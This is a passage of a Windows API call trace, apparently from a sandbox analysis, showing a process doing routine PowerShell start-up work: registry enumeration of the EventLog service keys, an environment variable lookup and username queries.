	[0429.125] RegEnumValueW (in: hKey=0x1bc, dwIndex=0x0, lpValueName=0x22c760, lpcchValueName=0x18d618, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x18d618, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0429.125] CoTaskMemFree (pv=0x22c760) 
	[0429.125] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.125] RegEnumValueW (in: hKey=0x1bc, dwIndex=0x1, lpValueName=0x22c760, lpcchValueName=0x18d618, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x18d618, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0429.125] CoTaskMemFree (pv=0x22c760) 
	[0429.125] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.125] RegEnumValueW (in: hKey=0x1bc, dwIndex=0x2, lpValueName=0x22c760, lpcchValueName=0x18d618, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x18d618, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0429.125] CoTaskMemFree (pv=0x22c760) 
	[0429.125] RegQueryValueExW (in: hKey=0x1bc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d5fc, lpData=0x0, lpcbData=0x18d5f8*=0x0 | out: lpType=0x18d5fc*=0x1, lpData=0x0, lpcbData=0x18d5f8*=0x8) returned 0x0
	[0429.125] CoTaskMemAlloc (cb=0xc) returned 0x2a9420
	[0429.125] RegQueryValueExW (in: hKey=0x1bc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d5cc, lpData=0x2a9420, lpcbData=0x18d5c8*=0x8 | out: lpType=0x18d5cc*=0x1, lpData="2.0", lpcbData=0x18d5c8*=0x8) returned 0x0
	[0429.125] CoTaskMemFree (pv=0x2a9420) 
	[0429.127] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0429.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.127] CoTaskMemFree (pv=0x290840) 
	[0429.132] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0429.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.132] CoTaskMemFree (pv=0x290840) 
	[0429.137] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d698 | out: phkResult=0x18d698*=0x1c0) returned 0x0
	[0429.141] RegQueryInfoKeyW (in: hKey=0x1c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d60c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d608, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d60c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d608*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.141] CoTaskMemFree (pv=0x0) 
	[0429.142] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.142] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x0, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.142] CoTaskMemFree (pv=0x22c760) 
	[0429.142] CoTaskMemFree (pv=0x0) 
	[0429.142] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.142] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x1, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.142] CoTaskMemFree (pv=0x22c760) 
	[0429.142] CoTaskMemFree (pv=0x0) 
	[0429.142] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.142] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x2, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.142] CoTaskMemFree (pv=0x22c760) 
	[0429.142] CoTaskMemFree (pv=0x0) 
	[0429.142] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.142] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x3, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.143] CoTaskMemFree (pv=0x22c760) 
	[0429.143] CoTaskMemFree (pv=0x0) 
	[0429.143] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.143] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x4, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.143] CoTaskMemFree (pv=0x22c760) 
	[0429.143] CoTaskMemFree (pv=0x0) 
	[0429.143] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.143] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x5, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.143] CoTaskMemFree (pv=0x22c760) 
	[0429.143] CoTaskMemFree (pv=0x0) 
	[0429.143] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.143] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x6, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.143] CoTaskMemFree (pv=0x22c760) 
	[0429.143] CoTaskMemFree (pv=0x0) 
	[0429.143] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.143] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x7, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.143] CoTaskMemFree (pv=0x22c760) 
	[0429.284] CoTaskMemFree (pv=0x0) 
	[0429.284] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.284] RegEnumKeyExW (in: hKey=0x1c0, dwIndex=0x8, lpName=0x22c760, lpcchName=0x18d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.284] CoTaskMemFree (pv=0x22c760) 
	[0429.284] CoTaskMemFree (pv=0x0) 
	[0429.284] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x2fc) returned 0x0
	[0429.284] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.284] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x300) returned 0x0
	[0429.285] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.285] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x314) returned 0x0
	[0429.285] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.285] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x328) returned 0x0
	[0429.285] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.285] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x32c) returned 0x0
	[0429.285] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.285] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x330) returned 0x0
	[0429.285] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.285] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x334) returned 0x0
	[0429.285] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.286] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x338) returned 0x0
	[0429.286] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x0) returned 0x2
	[0429.286] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x33c) returned 0x0
	[0429.286] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6f8 | out: phkResult=0x18d6f8*=0x340) returned 0x0
	[0429.286] RegCloseKey (hKey=0x340) returned 0x0
	[0429.286] RegCloseKey (hKey=0x1c0) returned 0x0
	[0429.287] RegCloseKey (hKey=0x33c) returned 0x0
	[0429.303] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0429.303] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0429.304] CoTaskMemFree (pv=0x1b35c010) 
	[0429.305] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.305] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0429.306] CoTaskMemFree (pv=0x22c760) 
	[0429.640] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d648 | out: phkResult=0x18d648*=0x328) returned 0x0
	[0429.640] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d5bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d5b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d5bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d5b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.640] CoTaskMemFree (pv=0x0) 
	[0429.640] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.640] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x0, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.640] CoTaskMemFree (pv=0x22c760) 
	[0429.640] CoTaskMemFree (pv=0x0) 
	[0429.640] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.640] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x1, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.640] CoTaskMemFree (pv=0x22c760) 
	[0429.640] CoTaskMemFree (pv=0x0) 
	[0429.640] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.640] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x2, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.640] CoTaskMemFree (pv=0x22c760) 
	[0429.640] CoTaskMemFree (pv=0x0) 
	[0429.641] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.641] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x3, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.641] CoTaskMemFree (pv=0x22c760) 
	[0429.641] CoTaskMemFree (pv=0x0) 
	[0429.641] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.641] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x4, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.641] CoTaskMemFree (pv=0x22c760) 
	[0429.641] CoTaskMemFree (pv=0x0) 
	[0429.641] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.641] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x5, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.641] CoTaskMemFree (pv=0x22c760) 
	[0429.641] CoTaskMemFree (pv=0x0) 
	[0429.641] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.641] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x6, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.641] CoTaskMemFree (pv=0x22c760) 
	[0429.641] CoTaskMemFree (pv=0x0) 
	[0429.641] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.641] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x7, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.641] CoTaskMemFree (pv=0x22c760) 
	[0429.641] CoTaskMemFree (pv=0x0) 
	[0429.641] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.641] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x8, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.641] CoTaskMemFree (pv=0x22c760) 
	[0429.641] CoTaskMemFree (pv=0x0) 
	[0429.641] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x32c) returned 0x0
	[0429.642] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.642] RegOpenKeyExW (in: hKey=0x328, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x330) returned 0x0
	[0429.642] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.642] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x334) returned 0x0
	[0429.642] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.642] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x338) returned 0x0
	[0429.642] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.642] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x1c4) returned 0x0
	[0429.642] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.642] RegOpenKeyExW (in: hKey=0x328, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x1bc) returned 0x0
	[0429.643] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.643] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x2fc) returned 0x0
	[0429.643] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.643] RegOpenKeyExW (in: hKey=0x328, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x300) returned 0x0
	[0429.643] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.643] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x314) returned 0x0
	[0429.643] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x344) returned 0x0
	[0429.643] RegCloseKey (hKey=0x344) returned 0x0
	[0429.643] RegCloseKey (hKey=0x328) returned 0x0
	[0429.644] RegCloseKey (hKey=0x314) returned 0x0
	[0429.645] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d648 | out: phkResult=0x18d648*=0x314) returned 0x0
	[0429.645] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d5bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d5b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d5bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d5b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.645] CoTaskMemFree (pv=0x0) 
	[0429.645] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.645] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.645] CoTaskMemFree (pv=0x22c760) 
	[0429.645] CoTaskMemFree (pv=0x0) 
	[0429.645] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.645] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.645] CoTaskMemFree (pv=0x22c760) 
	[0429.645] CoTaskMemFree (pv=0x0) 
	[0429.645] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.645] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.645] CoTaskMemFree (pv=0x22c760) 
	[0429.645] CoTaskMemFree (pv=0x0) 
	[0429.645] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.645] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.645] CoTaskMemFree (pv=0x22c760) 
	[0429.645] CoTaskMemFree (pv=0x0) 
	[0429.645] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.645] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.646] CoTaskMemFree (pv=0x22c760) 
	[0429.646] CoTaskMemFree (pv=0x0) 
	[0429.646] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.646] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.646] CoTaskMemFree (pv=0x22c760) 
	[0429.646] CoTaskMemFree (pv=0x0) 
	[0429.646] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.646] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.646] CoTaskMemFree (pv=0x22c760) 
	[0429.646] CoTaskMemFree (pv=0x0) 
	[0429.646] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.646] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.646] CoTaskMemFree (pv=0x22c760) 
	[0429.646] CoTaskMemFree (pv=0x0) 
	[0429.646] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0429.646] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x22c760, lpcchName=0x18d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0429.646] CoTaskMemFree (pv=0x22c760) 
	[0429.646] CoTaskMemFree (pv=0x0) 
	[0429.646] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x328) returned 0x0
	[0429.646] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.647] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x344) returned 0x0
	[0429.647] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.647] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x348) returned 0x0
	[0429.647] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
	[0429.647] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x34c) returned 0x0
	[0429.647] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d6a8 | out: phkResult=0x18d6a8*=0x0) returned 0x2
